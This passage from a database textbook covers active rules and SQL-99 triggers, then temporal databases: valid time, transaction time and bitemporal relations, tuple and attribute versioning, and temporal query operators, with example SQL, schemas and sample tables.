Active rules can also be used to enforce integrity constraints by specifying the types
of events that may cause the constraints to be violated and then evaluating appro-
priate conditions that check whether the constraints are actually violated by the
event or not. Hence, complex application constraints, often known as business
rules, may be enforced that way. For example, in a UNIVERSITY database applica-
tion, one rule may monitor the GPA of students whenever a new grade is entered,
and it may alert the advisor if the GPA of a student falls below a certain threshold;
another rule may check that course prerequisites are satisfied before allowing a stu-
dent to enroll in a course; and so on.
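
A sketch of the first business rule, again in the simplified notation of Figure 2, might look as follows. The GRADE and STUDENT tables, the 2.0 threshold, and the external procedure alert_advisor are hypothetical.

CREATE TRIGGER Low_gpa_alert
AFTER INSERT ON GRADE
FOR EACH ROW
WHEN ( ( SELECT Gpa FROM STUDENT WHERE Ssn = NEW.Student_ssn ) < 2.0 )
    alert_advisor(NEW.Student_ssn);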

Other applications include the automatic maintenance of derived data, such as the
examples of rules R1 through R4 that maintain the derived attribute Total_sal when-
ever individual employee tuples are changed. A similar application is to use active
rules to maintain the consistency of materialized views whenever the base relations
are modified. Alternately, an update operation specified on a view can be a trigger-
ing event, which can be converted to updates on the base relations by using an
instead of trigger. These applications are also relevant to the new data warehousing
technologies. A related application is to keep replicated tables consistent by
specifying rules that modify the replicas whenever the master table is modified.

1.5 Triggers in SQL-99
Triggers in the SQL-99 and later standards are quite similar to the examples we dis-
cussed in Section 1.1, with some minor syntactic differences. The basic events that
can be specified for triggering the rules are the standard SQL update commands:
INSERT, DELETE, and UPDATE. In the case of UPDATE, one may specify the attributes
to be updated. Both row-level and statement-level triggers are allowed, indicated in
the trigger by the clauses FOR EACH ROW and FOR EACH STATEMENT, respectively.
One syntactic difference is that the trigger may specify particular tuple variable
names for the old and new tuples instead of using the keywords NEW and OLD, as
shown in Figure 2. Trigger T1 in Figure 6 shows how the row-level trigger R2 from
Figure 2(a) may be specified in SQL-99. Inside the REFERENCING clause, we
named tuple variables (aliases) O and N to refer to the OLD tuple (before modifica-
tion) and NEW tuple (after modification), respectively. Trigger T2 in Figure 6 shows
how the statement-level trigger R2S from Figure 5 may be specified in SQL-99. For
a statement-level trigger, the REFERENCING clause is used to refer to the table of all
new tuples (newly inserted or newly updated) as N, whereas the table of all old
tuples (deleted tuples or tuples before they were updated) is referred to as O.

2 Temporal Database Concepts
Temporal databases, in the broadest sense, encompass all database applications that
require some aspect of time when organizing their information. Hence, they
provide a good example to illustrate the need for developing a set of unifying con-
cepts for application developers to use. Temporal database applications have been


developed since the early days of database usage. However, in creating these applica-
tions, it is mainly left to the application designers and developers to discover, design,
program, and implement the temporal concepts they need. There are many exam-
ples of applications where some aspect of time is needed to maintain the informa-
tion in a database. These include healthcare, where patient histories need to be
maintained; insurance, where claims and accident histories are required as well as
information about the times when insurance policies are in effect; reservation sys-
tems in general (hotel, airline, car rental, train, and so on), where information on the
dates and times when reservations are in effect are required; scientific databases,
where data collected from experiments includes the time when each data is meas-
ured; and so on. Even the two examples used in this text may be easily expanded into
temporal applications. In the COMPANY database, we may wish to keep SALARY,
JOB, and PROJECT histories on each employee. In the UNIVERSITY database, time is
already included in the SEMESTER and YEAR of each SECTION of a COURSE, the
grade history of a STUDENT, and the information on research grants. In fact, it is
realistic to conclude that the majority of database applications have some temporal
information. However, users often attempt to simplify or ignore temporal aspects
because of the complexity that they add to their applications.

In this section, we will introduce some of the concepts that have been developed to
deal with the complexity of temporal database applications. Section 2.1 gives an
overview of how time is represented in databases, the different types of temporal

T1: CREATE TRIGGER Total_sal1
AFTER UPDATE OF Salary ON EMPLOYEE
REFERENCING OLD ROW AS O, NEW ROW AS N
FOR EACH ROW
WHEN ( N.Dno IS NOT NULL )
UPDATE DEPARTMENT
SET Total_sal = Total_sal + N.salary – O.salary
WHERE Dno = N.Dno;

T2: CREATE TRIGGER Total_sal2
    AFTER UPDATE OF Salary ON EMPLOYEE
    REFERENCING OLD TABLE AS O, NEW TABLE AS N
    FOR EACH STATEMENT
    WHEN EXISTS ( SELECT * FROM N WHERE N.Dno IS NOT NULL ) OR
         EXISTS ( SELECT * FROM O WHERE O.Dno IS NOT NULL )
    UPDATE DEPARTMENT AS D
    SET D.Total_sal = D.Total_sal
        + ( SELECT SUM (N.Salary) FROM N WHERE D.Dno = N.Dno )
        - ( SELECT SUM (O.Salary) FROM O WHERE D.Dno = O.Dno )
    WHERE Dno IN ( ( SELECT Dno FROM N ) UNION ( SELECT Dno FROM O ) );

Figure 6
Trigger T1 illustrating
the syntax for defining
triggers in SQL-99.


information, and some of the different dimensions of time that may be needed.
Section 2.2 discusses how time can be incorporated into relational databases.
Section 2.3 gives some additional options for representing time that are possible in
database models that allow complex-structured objects, such as object databases.
Section 2.4 introduces operations for querying temporal databases, and gives a brief
overview of the TSQL2 language, which extends SQL with temporal concepts.
Section 2.5 focuses on time series data, which is a type of temporal data that is very
important in practice.

2.1 Time Representation, Calendars,
and Time Dimensions

For temporal databases, time is considered to be an ordered sequence of points in
some granularity that is determined by the application. For example, suppose that
some temporal application never requires time units that are less than one second.
Then, each time point represents one second using this granularity. In reality, each
second is a (short) time duration, not a point, since it may be further divided into
milliseconds, microseconds, and so on. Temporal database researchers have used the
term chronon instead of point to describe this minimal granularity for a particular
application. The main consequence of choosing a minimum granularity—say, one
second—is that events occurring within the same second will be considered to be
simultaneous events, even though in reality they may not be.

Because there is no known beginning or ending of time, one needs a reference point
from which to measure specific time points. Various calendars are used by various
cultures (such as Gregorian (western), Chinese, Islamic, Hindu, Jewish, Coptic, and
so on) with different reference points. A calendar organizes time into different time
units for convenience. Most calendars group 60 seconds into a minute, 60 minutes
into an hour, 24 hours into a day (based on the physical time of earth’s rotation
around its axis), and 7 days into a week. Further grouping of days into months and
months into years either follow solar or lunar natural phenomena, and are generally
irregular. In the Gregorian calendar, which is used in most western countries, days
are grouped into months that are 28, 29, 30, or 31 days, and 12 months are grouped
into a year. Complex formulas are used to map the different time units to one
another.

In SQL2, the temporal data types include DATE (specifying Year, Month, and Day as
YYYY-MM-DD), TIME (specifying Hour, Minute, and Second as HH:MM:SS),
TIMESTAMP (specifying a Date/Time combination, with options for including sub-
second divisions if they are needed), INTERVAL (a relative time duration, such as
10 days or 250 minutes), and PERIOD (an anchored time duration with a fixed start-
ing point, such as the 10-day period from January 1, 2009, to January 10, 2009,
inclusive).11

11Unfortunately, the terminology has not been used consistently. For example, the term interval is often
used to denote an anchored duration. For consistency, we will use the SQL terminology.
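
A minimal sketch of how these types might appear in a table declaration follows; the POLICY table and its columns are hypothetical, and PERIOD is omitted because support for it varies across systems.

CREATE TABLE POLICY (
    Policy_id    INT,
    Start_date   DATE,           -- YYYY-MM-DD
    Issue_time   TIME,           -- HH:MM:SS
    Recorded_at  TIMESTAMP,      -- date/time, optionally with fractional seconds
    Grace_period INTERVAL DAY    -- a relative duration, such as 10 days
);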


Event Information versus Duration (or State) Information. A temporal data-
base will store information concerning when certain events occur, or when certain
facts are considered to be true. There are several different types of temporal infor-
mation. Point events or facts are typically associated in the database with a single
time point in some granularity. For example, a bank deposit event may be associ-
ated with the timestamp when the deposit was made, or the total monthly sales of a
product (fact) may be associated with a particular month (say, February 2010). Note
that even though such events or facts may have different granularities, each is still
associated with a single time value in the database. This type of information is often
represented as time series data as we will discuss in Section 2.5. Duration events or
facts, on the other hand, are associated with a specific time period in the database.12

For example, an employee may have worked in a company from August 15, 2003
until November 20, 2008.

A time period is represented by its start and end time points [START-TIME, END-
TIME]. For example, the above period is represented as [2003-08-15, 2008-11-20].
Such a time period is often interpreted to mean the set of all time points from start-
time to end-time, inclusive, in the specified granularity. Hence, assuming day gran-
ularity, the period [2003-08-15, 2008-11-20] represents the set of all days from
August 15, 2003, until November 20, 2008, inclusive.13

Valid Time and Transaction Time Dimensions. Given a particular event or fact
that is associated with a particular time point or time period in the database, the
association may be interpreted to mean different things. The most natural interpre-
tation is that the associated time is the time that the event occurred, or the period
during which the fact was considered to be true in the real world. If this interpreta-
tion is used, the associated time is often referred to as the valid time. A temporal
database using this interpretation is called a valid time database.

However, a different interpretation can be used, where the associated time refers to
the time when the information was actually stored in the database; that is, it is the
value of the system time clock when the information is valid in the system.14 In this
case, the associated time is called the transaction time. A temporal database using
this interpretation is called a transaction time database.

Other interpretations can also be intended, but these are considered to be the most
common ones, and they are referred to as time dimensions. In some applications,
only one of the dimensions is needed and in other cases both time dimensions are
required, in which case the temporal database is called a bitemporal database. If

12This is the same as an anchored duration. It has also been frequently called a time interval, but to avoid
confusion we will use period to be consistent with SQL terminology.
13The representation [2003-08-15, 2008-11-20] is called a closed interval representation. One can also
use an open interval, denoted [2003-08-15, 2008-11-21), where the set of points does not include the
end point. Although the latter representation is sometimes more convenient, we shall use closed intervals
except where indicated.
14The explanation is more involved, as we will see in Section 2.3.


(a) EMP_VT(Name, Ssn, Salary, Dno, Supervisor_ssn, Vst, Vet)
    DEPT_VT(Dname, Dno, Total_sal, Manager_ssn, Vst, Vet)

(b) EMP_TT(Name, Ssn, Salary, Dno, Supervisor_ssn, Tst, Tet)
    DEPT_TT(Dname, Dno, Total_sal, Manager_ssn, Tst, Tet)

(c) EMP_BT(Name, Ssn, Salary, Dno, Supervisor_ssn, Vst, Vet, Tst, Tet)
    DEPT_BT(Dname, Dno, Total_sal, Manager_ssn, Vst, Vet, Tst, Tet)

Figure 7
Different types of temporal relational databases. (a) Valid time database schema. (b) Transaction time database schema. (c) Bitemporal database schema.

other interpretations are intended for time, the user can define the semantics and
program the applications appropriately, and it is called a user-defined time.

The next section shows how these concepts can be incorporated into relational
databases, and Section 2.3 shows an approach to incorporate temporal concepts
into object databases.

2.2 Incorporating Time in Relational Databases
Using Tuple Versioning

Valid Time Relations. Let us now see how the different types of temporal data-
bases may be represented in the relational model. First, suppose that we would like
to include the history of changes as they occur in the real world. Consider again the
database in Figure 1, and let us assume that, for this application, the granularity is
day. Then, we could convert the two relations EMPLOYEE and DEPARTMENT into
valid time relations by adding the attributes Vst (Valid Start Time) and Vet (Valid
End Time), whose data type is DATE in order to provide day granularity. This is
shown in Figure 7(a), where the relations have been renamed EMP_VT and
DEPT_VT, respectively.

Consider how the EMP_VT relation differs from the nontemporal EMPLOYEE rela-
tion (Figure 1).15 In EMP_VT, each tuple V represents a version of an employee’s

15A nontemporal relation is also called a snapshot relation because it shows only the current snapshot
or current state of the database.


EMP_VT
Name     Ssn        Salary  Dno  Supervisor_ssn  Vst         Vet
Smith    123456789  25000   5    333445555       2002-06-15  2003-05-31
Smith    123456789  30000   5    333445555       2003-06-01  Now
Wong     333445555  25000   4    999887777       1999-08-20  2001-01-31
Wong     333445555  30000   5    999887777       2001-02-01  2002-03-31
Wong     333445555  40000   5    888665555       2002-04-01  Now
Brown    222447777  28000   4    999887777       2001-05-01  2002-08-10
Narayan  666884444  38000   5    333445555       2003-08-01  Now
...

DEPT_VT
Dname     Dno  Manager_ssn  Vst         Vet
Research  5    888665555    2001-09-20  2002-03-31
Research  5    333445555    2002-04-01  Now

Figure 8
Some tuple versions in the valid time relations EMP_VT and DEPT_VT.

information that is valid (in the real world) only during the time period [V.Vst, V.Vet],
whereas in EMPLOYEE each tuple represents only the current state or current ver-
sion of each employee. In EMP_VT, the current version of each employee typically
has a special value, now, as its valid end time. This special value, now, is a temporal
variable that implicitly represents the current time as time progresses. The nontem-
poral EMPLOYEE relation would only include those tuples from the EMP_VT rela-
tion whose Vet is now.

Figure 8 shows a few tuple versions in the valid-time relations EMP_VT and
DEPT_VT. There are two versions of Smith, three versions of Wong, one version of
Brown, and one version of Narayan. We can now see how a valid time relation
should behave when information is changed. Whenever one or more attributes of
an employee are updated, rather than actually overwriting the old values, as would
happen in a nontemporal relation, the system should create a new version and close
the current version by changing its Vet to the end time. Hence, when the user issued
the command to update the salary of Smith effective on June 1, 2003, to $30000,
the second version of Smith was created (see Figure 8). At the time of this update,
the first version of Smith was the current version, with now as its Vet, but after the
update now was changed to May 31, 2003 (one less than June 1, 2003, in day granu-
larity), to indicate that the version has become a closed or history version and that
the new (second) version of Smith is now the current one.
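
In plain SQL, the salary change for Smith could be applied to EMP_VT along the following lines. This is only a sketch; it assumes that the special value now is encoded as NULL in the Vet column, which is one common implementation choice.

-- Close the current version of Smith as of May 31, 2003
UPDATE EMP_VT
SET Vet = DATE '2003-05-31'
WHERE Ssn = '123456789' AND Vet IS NULL;   -- NULL stands in for now

-- Insert the new current version, effective June 1, 2003
INSERT INTO EMP_VT (Name, Ssn, Salary, Dno, Supervisor_ssn, Vst, Vet)
VALUES ('Smith', '123456789', 30000, 5, '333445555', DATE '2003-06-01', NULL);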


It is important to note that in a valid time relation, the user must generally provide
the valid time of an update. For example, the salary update of Smith may have been
entered in the database on May 15, 2003, at 8:52:12 A.M., say, even though the salary
change in the real world is effective on June 1, 2003. This is called a proactive
update, since it is applied to the database before it becomes effective in the real
world. If the update is applied to the database after it becomes effective in the real
world, it is called a retroactive update. An update that is applied at the same time as
it becomes effective is called a simultaneous update.

The action that corresponds to deleting an employee in a nontemporal database
would typically be applied to a valid time database by closing the current version of
the employee being deleted. For example, if Smith leaves the company effective
January 19, 2004, then this would be applied by changing Vet of the current version
of Smith from now to 2004-01-19. In Figure 8, there is no current version for
Brown, because he presumably left the company on 2002-08-10 and was logically
deleted. However, because the database is temporal, the old information on Brown is
still there.

The operation to insert a new employee would correspond to creating the first tuple
version for that employee, and making it the current version, with the Vst being the
effective (real world) time when the employee starts work. In Figure 8, the tuple on
Narayan illustrates this, since the first version has not been updated yet.

Notice that in a valid time relation, the nontemporal key, such as Ssn in EMPLOYEE,
is no longer unique in each tuple (version). The new relation key for EMP_VT is a
combination of the nontemporal key and the valid start time attribute Vst,16 so we
use (Ssn, Vst) as primary key. This is because, at any point in time, there should be at
most one valid version of each entity. Hence, the constraint that any two tuple ver-
sions representing the same entity should have nonintersecting valid time periods
should hold on valid time relations. Notice that if the nontemporal primary key
value may change over time, it is important to have a unique surrogate key attrib-
ute, whose value never changes for each real-world entity, in order to relate all ver-
sions of the same real-world entity.
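
Declaring (Ssn, Vst) as the key does not by itself enforce the nonintersection constraint. A sketch of a query that detects violating pairs of versions is shown below; it assumes closed periods and, as before, NULL encoding now (mapped here to a far-future date for comparison).

SELECT E1.Ssn
FROM EMP_VT E1, EMP_VT E2
WHERE E1.Ssn = E2.Ssn
  AND E1.Vst < E2.Vst                                   -- two distinct versions, E1 starts first
  AND E2.Vst <= COALESCE(E1.Vet, DATE '9999-12-31');    -- E2 starts before E1 ends: overlap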

Valid time relations basically keep track of the history of changes as they become
effective in the real world. Hence, if all real-world changes are applied, the database
keeps a history of the real-world states that are represented. However, because
updates, insertions, and deletions may be applied retroactively or proactively, there is
no record of the actual database state at any point in time. If the actual database states
are important to an application, then one should use transaction time relations.

Transaction Time Relations. In a transaction time database, whenever a change
is applied to the database, the actual timestamp of the transaction that applied the
change (insert, delete, or update) is recorded. Such a database is most useful when
changes are applied simultaneously in the majority of cases—for example, real-time
stock trading or banking transactions. If we convert the nontemporal database in

16A combination of the nontemporal key and the valid end time attribute Vet could also be used.


Figure 1 into a transaction time database, then the two relations EMPLOYEE and
DEPARTMENT are converted into transaction time relations by adding the attrib-
utes Tst (Transaction Start Time) and Tet (Transaction End Time), whose data type
is typically TIMESTAMP. This is shown in Figure 7(b), where the relations have been
renamed EMP_TT and DEPT_TT, respectively.

In EMP_TT, each tuple V represents a version of an employee’s information that was
created at actual time V.Tst and was (logically) removed at actual time V.Tet
(because the information was no longer correct). In EMP_TT, the current version of
each employee typically has a special value, uc (Until Changed), as its transaction
end time, which indicates that the tuple represents correct information until it is
changed by some other transaction.17 A transaction time database has also been
called a rollback database,18 because a user can logically roll back to the actual
database state at any past point in time T by retrieving all tuple versions V whose
transaction time period [V.Tst, V.Tet] includes time point T.
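
For example, the state of EMP_TT as of some past time point T could be retrieved with a query along these lines; this sketch assumes that uc is encoded as NULL in the Tet column.

SELECT *
FROM EMP_TT
WHERE Tst <= TIMESTAMP '2003-01-01 00:00:00'
  AND ( Tet IS NULL OR Tet > TIMESTAMP '2003-01-01 00:00:00' );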

Bitemporal Relations. Some applications require both valid time and transac-
tion time, leading to bitemporal relations. In our example, Figure 7(c) shows how
the EMPLOYEE and DEPARTMENT nontemporal relations in Figure 1 would appear
as bitemporal relations EMP_BT and DEPT_BT, respectively. Figure 9 shows a few
tuples in these relations. In these tables, tuples whose transaction end time Tet is uc
are the ones representing currently valid information, whereas tuples whose Tet is an
absolute timestamp are tuples that were valid until (just before) that timestamp.
Hence, the tuples with uc in Figure 9 correspond to the valid time tuples in Figure 8.
The transaction start time attribute Tst in each tuple is the timestamp of the trans-
action that created that tuple.

Now consider how an update operation would be implemented on a bitemporal
relation. In this model of bitemporal databases,19 no attributes are physically
changed in any tuple except for the transaction end time attribute Tet with a value of
uc.20 To illustrate how tuples are created, consider the EMP_BT relation. The current
version V of an employee has uc in its Tet attribute and now in its Vet attribute. If
some attribute—say, Salary—is updated, then the transaction T that performs the
update should have two parameters: the new value of Salary and the valid time VT
when the new salary becomes effective (in the real world). Assume that VT− is the

17The uc variable in transaction time relations corresponds to the now variable in valid time relations. The
semantics are slightly different though.
18Here, the term rollback does not have the same meaning as transaction rollback during recovery, where
the transaction updates are physically undone. Rather, here the updates can be logically undone, allowing
the user to examine the database as it appeared at a previous time point.
19There have been many proposed temporal database models. We describe specific models here as
examples to illustrate the concepts.
20Some bitemporal models allow the Vet attribute to be changed also, but the interpretations of the
tuples are different in those models.


EMP_BT
Name     Ssn        Salary  Dno  Supervisor_ssn  Vst         Vet         Tst                  Tet
Smith    123456789  25000   5    333445555       2002-06-15  Now         2002-06-08,13:05:58  2003-06-04,08:56:12
Smith    123456789  25000   5    333445555       2002-06-15  2003-05-31  2003-06-04,08:56:12  uc
Smith    123456789  30000   5    333445555       2003-06-01  Now         2003-06-04,08:56:12  uc
Wong     333445555  25000   4    999887777       1999-08-20  Now         1999-08-20,11:18:23  2001-01-07,14:33:02
Wong     333445555  25000   4    999887777       1999-08-20  2001-01-31  2001-01-07,14:33:02  uc
Wong     333445555  30000   5    999887777       2001-02-01  Now         2001-01-07,14:33:02  2002-03-28,09:23:57
Wong     333445555  30000   5    999887777       2001-02-01  2002-03-31  2002-03-28,09:23:57  uc
Wong     333445555  40000   5    888667777       2002-04-01  Now         2002-03-28,09:23:57  uc
Brown    222447777  28000   4    999887777       2001-05-01  Now         2001-04-27,16:22:05  2002-08-12,10:11:07
Brown    222447777  28000   4    999887777       2001-05-01  2002-08-10  2002-08-12,10:11:07  uc
Narayan  666884444  38000   5    333445555       2003-08-01  Now         2003-07-28,09:25:37  uc
...

DEPT_BT
Dname     Dno  Manager_ssn  Vst         Vet         Tst                  Tet
Research  5    888665555    2001-09-20  Now         2001-09-15,14:52:12  2002-03-28,09:23:57
Research  5    888665555    2001-09-20  2002-03-31  2002-03-28,09:23:57  uc
Research  5    333445555    2002-04-01  Now         2002-03-28,09:23:57  uc

Figure 9
Some tuple versions in the bitemporal relations EMP_BT and DEPT_BT.

time point before VT in the given valid time granularity and that transaction T has a
timestamp TS(T). Then, the following physical changes would be applied to the
EMP_BT table:

1. Make a copy V2 of the current version V; set V2.Vet to VT−, V2.Tst to TS(T),
V2.Tet to uc, and insert V2 in EMP_BT; V2 is a copy of the previous current
version V after it is closed at valid time VT−.

2. Make a copy V3 of the current version V; set V3.Vst to VT, V3.Vet to now,
V3.Salary to the new salary value, V3.Tst to TS(T), V3.Tet to uc, and insert V3 in
EMP_BT; V3 represents the new current version.

3. Set V.Tet to TS(T) since the current version is no longer representing correct
information.

As an illustration, consider the first three tuples V1, V2, and V3 in EMP_BT in Figure
9. Before the update of Smith’s salary from 25000 to 30000, only V1 was in EMP_BT
and it was the current version and its Tet was uc. Then, a transaction T whose time-
stamp TS(T) is ‘2003-06-04,08:56:12’ updates the salary to 30000 with the effective
valid time of ‘2003-06-01’. The tuple V2 is created, which is a copy of V1 except that
its Vet is set to ‘2003-05-31’, one day less than the new valid time and
its Tst is the timestamp of the updating transaction. The tuple V3 is also created,
which has the new salary, its Vst is set to ‘2003-06-01’, and its Tst is also the time-
stamp of the updating transaction. Finally, the Tet of V1 is set to the timestamp of


the updating transaction, ‘2003-06-04,08:56:12’. Note that this is a retroactive
update, since the updating transaction ran on June 4, 2003, but the salary change is
effective on June 1, 2003.
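
The three physical changes above can be expressed in plain SQL roughly as follows for the Smith update. This is a sketch only; it assumes now and uc are both encoded as NULL, and it performs step 3 first so that the version being closed can still be identified when the two copies are made.

-- Step 3 (done first here): close the current version V1 in transaction time
UPDATE EMP_BT
SET Tet = TIMESTAMP '2003-06-04 08:56:12'
WHERE Ssn = '123456789' AND Tet IS NULL AND Vet IS NULL;

-- Step 1: copy of the old version, closed at valid time VT- = 2003-05-31 (creates V2)
INSERT INTO EMP_BT (Name, Ssn, Salary, Dno, Supervisor_ssn, Vst, Vet, Tst, Tet)
SELECT Name, Ssn, Salary, Dno, Supervisor_ssn, Vst, DATE '2003-05-31',
       TIMESTAMP '2003-06-04 08:56:12', NULL
FROM EMP_BT
WHERE Ssn = '123456789' AND Vet IS NULL
  AND Tet = TIMESTAMP '2003-06-04 08:56:12';

-- Step 2: new current version with the new salary, effective 2003-06-01 (creates V3)
INSERT INTO EMP_BT (Name, Ssn, Salary, Dno, Supervisor_ssn, Vst, Vet, Tst, Tet)
SELECT Name, Ssn, 30000, Dno, Supervisor_ssn, DATE '2003-06-01', NULL,
       TIMESTAMP '2003-06-04 08:56:12', NULL
FROM EMP_BT
WHERE Ssn = '123456789' AND Vet IS NULL
  AND Tet = TIMESTAMP '2003-06-04 08:56:12';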

Similarly, when Wong’s salary and department are updated (at the same time) to
30000 and 5, the updating transaction’s timestamp is ‘2001-01-07,14:33:02’ and the
effective valid time for the update is ‘2001-02-01’. Hence, this is a proactive update
because the transaction ran on January 7, 2001, but the effective date was February
1, 2001. In this case, tuple V4 is logically replaced by V5 and V6.

Next, let us illustrate how a delete operation would be implemented on a bitempo-
ral relation by considering the tuples V9 and V10 in the EMP_BT relation of Figure 9.
Here, employee Brown left the company effective August 10, 2002, and the logical
delete is carried out by a transaction T with TS(T) = 2002-08-12,10:11:07. Before
this, V9 was the current version of Brown, and its Tet was uc. The logical delete is
implemented by setting V9.Tet to 2002-08-12,10:11:07 to invalidate it, and creating
the final version V10 for Brown, with its Vet = 2002-08-10 (see Figure 9). Finally, an
insert operation is implemented by creating the first version as illustrated by V11 in
the EMP_BT table.

Implementation Considerations. There are various options for storing the
tuples in a temporal relation. One is to store all the tuples in the same table, as
shown in Figures 8 and 9. Another option is to create two tables: one for the cur-
rently valid information and the other for the rest of the tuples. For example, in the
bitemporal EMP_BT relation, tuples with uc for their Tet and now for their Vet would
be in one relation, the current table, since they are the ones currently valid (that is,
represent the current snapshot), and all other tuples would be in another relation.
This allows the database administrator to have different access paths, such as
indexes for each relation, and keeps the size of the current table reasonable. Another
possibility is to create a third table for corrected tuples whose Tet is not uc.
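
One way to realize the two-table option is sketched below; the table names and the view that reunites them are hypothetical, and uc and now are again assumed to be encoded as NULL.

-- Currently valid tuples (Tet = uc and Vet = now) live in EMP_BT_CURRENT;
-- all other tuples live in EMP_BT_HISTORY. A view reunites them for queries
-- that need the complete bitemporal relation.
CREATE VIEW EMP_BT AS
    SELECT * FROM EMP_BT_CURRENT
    UNION ALL
    SELECT * FROM EMP_BT_HISTORY;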

Another option that is available is to vertically partition the attributes of the tempo-
ral relation into separate relations so that if a relation has many attributes, a whole
new tuple version is created whenever any one of the attributes is updated. If the
attributes are updated asynchronously, each new version may differ in only one of
the attributes, thus needlessly repeating the other attribute values. If a separate rela-
tion is created to contain only the attributes that always change synchronously, with
the primary key replicated in each relation, the database is said to be in temporal
normal form. However, to combine the information, a variation of join known
as temporal intersection join would be needed, which is generally expensive to
implement.
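
A temporal intersection join can be sketched in plain SQL along the following lines. SAL_HISTORY and DEPT_HISTORY are hypothetical vertically partitioned valid time relations, each with its own [Vst, Vet] period; the join keeps only pairs whose periods overlap and returns the intersection period (handling of the special value now is omitted for brevity).

SELECT S.Ssn, S.Salary, D.Dno,
       CASE WHEN S.Vst > D.Vst THEN S.Vst ELSE D.Vst END AS Vst,   -- later start
       CASE WHEN S.Vet < D.Vet THEN S.Vet ELSE D.Vet END AS Vet    -- earlier end
FROM SAL_HISTORY S, DEPT_HISTORY D
WHERE S.Ssn = D.Ssn
  AND S.Vst <= D.Vet AND D.Vst <= S.Vet;   -- the two periods overlap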

It is important to note that bitemporal databases allow a complete record of
changes. Even a record of corrections is possible. For example, it is possible that two
tuple versions of the same employee may have the same valid time but different
attribute values as long as their transaction times are disjoint. In this case, the tuple
with the later transaction time is a correction of the other tuple version. Even incor-
rectly entered valid times may be corrected this way. The incorrect state of the data-


base will still be available as a previous database state for querying purposes. A data-
base that keeps such a complete record of changes and corrections is sometimes
called an append-only database.

2.3 Incorporating Time in Object-Oriented Databases
Using Attribute Versioning

The previous section discussed the tuple versioning approach to implementing
temporal databases. In this approach, whenever one attribute value is changed, a
whole new tuple version is created, even though all the other attribute values will
be identical to the previous tuple version. An alternative approach can be used in
database systems that support complex structured objects, such as object data-
bases or object-relational systems. This approach is called attribute versioning.

In attribute versioning, a single complex object is used to store all the temporal
changes of the object. Each attribute that changes over time is called a time-varying
attribute, and it has its values versioned over time by adding temporal periods to
the attribute. The temporal periods may represent valid time, transaction time, or
bitemporal, depending on the application requirements. Attributes that do not
change over time are called nontime-varying and are not associated with the tem-
poral periods. To illustrate this, consider the example in Figure 10, which is an
attribute-versioned valid time representation of EMPLOYEE using the object defini-
tion language (ODL) notation for object databases. Here, we assumed that name
and Social Security number are nontime-varying attributes, whereas salary, depart-
ment, and supervisor are time-varying attributes (they may change over time). Each
time-varying attribute is represented as a list of tuples <Valid_start_time, Valid_end_time, Value>, ordered by valid start time.

Whenever an attribute is changed in this model, the current attribute version is
closed and a new attribute version for this attribute only is appended to the list.
This allows attributes to change asynchronously. The current value for each attrib-
ute has now for its Valid_end_time. When using attribute versioning, it is useful to
include a lifespan temporal attribute associated with the whole object whose value
is one or more valid time periods that indicate the valid time of existence for the
whole object. Logical deletion of the object is implemented by closing the lifespan.
The constraint that any time period of an attribute within an object should be a
subset of the object’s lifespan should be enforced.

For bitemporal databases, each attribute version would have a tuple with five components:

<Valid_start_time, Valid_end_time, Trans_start_time, Trans_end_time, Value>

The object lifespan would also include both valid and transaction time dimensions.
Therefore, the full capabilities of bitemporal databases can be available with attrib-
ute versioning. Mechanisms similar to those discussed earlier for updating tuple
versions can be applied to updating attribute versions.


class TEMPORAL_SALARY
{    attribute Date    Valid_start_time;
     attribute Date    Valid_end_time;
     attribute float   Salary;
};

class TEMPORAL_DEPT
{    attribute Date            Valid_start_time;
     attribute Date            Valid_end_time;
     attribute DEPARTMENT_VT   Dept;
};

class TEMPORAL_SUPERVISOR
{    attribute Date          Valid_start_time;
     attribute Date          Valid_end_time;
     attribute EMPLOYEE_VT   Supervisor;
};

class TEMPORAL_LIFESPAN
{    attribute Date   Valid_start_time;
     attribute Date   Valid_end_time;
};

class EMPLOYEE_VT
(    extent EMPLOYEES )
{    attribute list<TEMPORAL_LIFESPAN>     lifespan;
     attribute string                      Name;
     attribute string                      Ssn;
     attribute list<TEMPORAL_SALARY>       Sal_history;
     attribute list<TEMPORAL_DEPT>         Dept_history;
     attribute list<TEMPORAL_SUPERVISOR>   Supervisor_history;
};

Figure 10
Possible ODL schema for a temporal valid time EMPLOYEE_VT
object class using attribute versioning.

2.4 Temporal Querying Constructs
and the TSQL2 Language

So far, we have discussed how data models may be extended with temporal con-
structs. Now we give a brief overview of how query operations need to be extended
for temporal querying. We will briefly discuss the TSQL2 language, which extends
SQL for querying valid time, transaction time, and bitemporal relational databases.

In nontemporal relational databases, the typical selection conditions involve attrib-
ute conditions, and tuples that satisfy these conditions are selected from the set of


current tuples. Following that, the attributes of interest to the query are specified by
a projection operation. For example, in the query to retrieve the names of all employ-
ees working in department 5 whose salary is greater than 30000, the selection condi-
tion would be as follows:

((Salary > 30000) AND (Dno = 5))

The projected attribute would be Name. In a temporal database, the conditions may
involve time in addition to attributes. A pure time condition involves only time—
for example, to select all employee tuple versions that were valid on a certain time
point T or that were valid during a certain time period [T1, T2]. In this case, the spec-
ified time period is compared with the valid time period of each tuple version [T.Vst,
T.Vet], and only those tuples that satisfy the condition are selected. In these opera-
tions, a period is considered to be equivalent to the set of time points from T1 to T2
inclusive, so the standard set comparison operations can be used. Additional opera-
tions, such as whether one time period ends before another starts are also needed.21

Some of the more common operations used in queries are as follows:

[T.Vst, T.Vet] INCLUDES [T1, T2]       Equivalent to T1 ≥ T.Vst AND T2 ≤ T.Vet
[T.Vst, T.Vet] INCLUDED_IN [T1, T2]    Equivalent to T1 ≤ T.Vst AND T2 ≥ T.Vet
[T.Vst, T.Vet] OVERLAPS [T1, T2]       Equivalent to (T1 ≤ T.Vet AND T2 ≥ T.Vst) (see footnote 22)
[T.Vst, T.Vet] BEFORE [T1, T2]         Equivalent to T1 ≥ T.Vet
[T.Vst, T.Vet] AFTER [T1, T2]          Equivalent to T2 ≤ T.Vst
[T.Vst, T.Vet] MEETS_BEFORE [T1, T2]   Equivalent to T1 = T.Vet + 1 (see footnote 23)
[T.Vst, T.Vet] MEETS_AFTER [T1, T2]    Equivalent to T2 + 1 = T.Vst
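
As a rough illustration, the operations listed above can be implemented directly over closed periods represented as (start, end) pairs at day granularity; the Python sketch below is hypothetical and covers only a few of the operators.

from datetime import date, timedelta

def includes(period, other):
    # [T.Vst, T.Vet] INCLUDES [T1, T2]: T1 >= T.Vst AND T2 <= T.Vet
    (vst, vet), (t1, t2) = period, other
    return t1 >= vst and t2 <= vet

def overlaps(period, other):
    # True if the intersection of the two periods is not empty (INTERSECTS_WITH).
    (vst, vet), (t1, t2) = period, other
    return t1 <= vet and t2 >= vst

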